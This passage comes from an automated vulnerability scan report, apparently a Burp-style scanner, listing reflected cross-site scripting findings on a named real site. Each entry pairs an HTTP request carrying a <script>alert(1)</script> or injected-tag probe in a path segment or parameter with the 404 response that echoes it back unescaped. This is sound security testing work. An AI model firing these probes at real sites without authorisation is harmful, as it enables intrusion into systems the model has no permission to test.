User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9baa7<script>alert(1)</script>a1787707a3/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3243. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e634<script>alert(1)</script>a5d38bf50c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/459e634<script>alert(1)</script>a5d38bf50c9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/459e634<script>alert(1)</script>a5d38bf50c9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3244. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4de27<script>alert(1)</script>2ca2e0f965a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes4de27<script>alert(1)</script>2ca2e0f965a/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes4de27<script>alert(1)</script>2ca2e0f965a/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3245. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3f717<script>alert(1)</script>e551f3eb0b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos3f717<script>alert(1)</script>e551f3eb0b4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos3f717<script>alert(1)</script>e551f3eb0b4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3246. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aedae<script>alert(1)</script>f6eefadf1ad was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/search.phpaedae<script>alert(1)</script>f6eefadf1ad?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.phpaedae<script>alert(1)</script>f6eefadf1ad?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3247. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e0d69<a>fa7fb88e4a2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Searche0d69<a>fa7fb88e4a2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Searche0d69<a>fa7fb88e4a2&opt=2 was not found on this server.</p>
...[SNIP]...

2.3248. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 796a6<a>61023883201 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...796a6<a>61023883201&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...796a6<a>61023883201&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3249. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bb816<script>alert(1)</script>8e676af9abf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bb816<script>alert(1)</script>8e676af9abf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&bb816<script>alert(1)</script>8e676af9abf=1 was not found on this server.</p>
...[SNIP]...

2.3250. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload fff89<a>e864012dc29 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2fff89<a>e864012dc29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2fff89<a>e864012dc29 was not found on this server.</p>
...[SNIP]...

2.3251. http://www.resellerbase.com/detail/45/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4e06<script>alert(1)</script>7e179956a96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila4e06<script>alert(1)</script>7e179956a96/45/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila4e06<script>alert(1)</script>7e179956a96/45/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3252. http://www.resellerbase.com/detail/45/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c19e8<script>alert(1)</script>428a97b2343 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45c19e8<script>alert(1)</script>428a97b2343/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45c19e8<script>alert(1)</script>428a97b2343/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3253. http://www.resellerbase.com/detail/45/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96371<script>alert(1)</script>c9ee4c9acfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes96371<script>alert(1)</script>c9ee4c9acfe/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes96371<script>alert(1)</script>c9ee4c9acfe/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3254. http://www.resellerbase.com/detail/45/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ab1<script>alert(1)</script>826926bf67c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/search.php36ab1<script>alert(1)</script>826926bf67c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php36ab1<script>alert(1)</script>826926bf67c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3255. http://www.resellerbase.com/detail/45/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload deda1<a>be17d40ef09 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/search.php?keyword=search...&Submit3=Searchdeda1<a>be17d40ef09&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php?keyword=search...&Submit3=Searchdeda1<a>be17d40ef09&opt=2 was not found on this server.</p>
...[SNIP]...

2.3256. http://www.resellerbase.com/detail/45/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e410a<a>77104e0fed was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/search.php?keyword=search...e410a<a>77104e0fed&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php?keyword=search...e410a<a>77104e0fed&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3257. http://www.resellerbase.com/detail/45/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 785ee<script>alert(1)</script>ff059c312c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=2&785ee<script>alert(1)</script>ff059c312c2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=2&785ee<script>alert(1)</script>ff059c312c2=1 was not found on this server.</p>
...[SNIP]...

2.3258. http://www.resellerbase.com/detail/45/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 83476<a>7613c2f542 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=283476<a>7613c2f542 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=283476<a>7613c2f542 was not found on this server.</p>
...[SNIP]...

2.3259. http://www.resellerbase.com/detail/46/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2bab7<script>alert(1)</script>0daf7e86c24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2bab7<script>alert(1)</script>0daf7e86c24/46/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2bab7<script>alert(1)</script>0daf7e86c24/46/ was not found on this server.</p>
...[SNIP]...

2.3260. http://www.resellerbase.com/detail/46/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0f45<script>alert(1)</script>666e5a2a56c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46a0f45<script>alert(1)</script>666e5a2a56c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
